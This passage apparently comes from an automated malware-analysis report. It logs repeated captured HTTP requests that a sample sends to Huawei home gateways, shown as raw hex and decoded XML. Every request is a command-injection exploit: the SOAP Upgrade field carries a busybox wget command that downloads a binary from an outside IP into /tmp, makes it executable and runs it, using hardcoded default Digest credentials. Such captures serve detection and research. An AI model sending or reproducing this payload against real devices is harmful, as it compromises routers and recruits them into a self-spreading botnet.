6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l 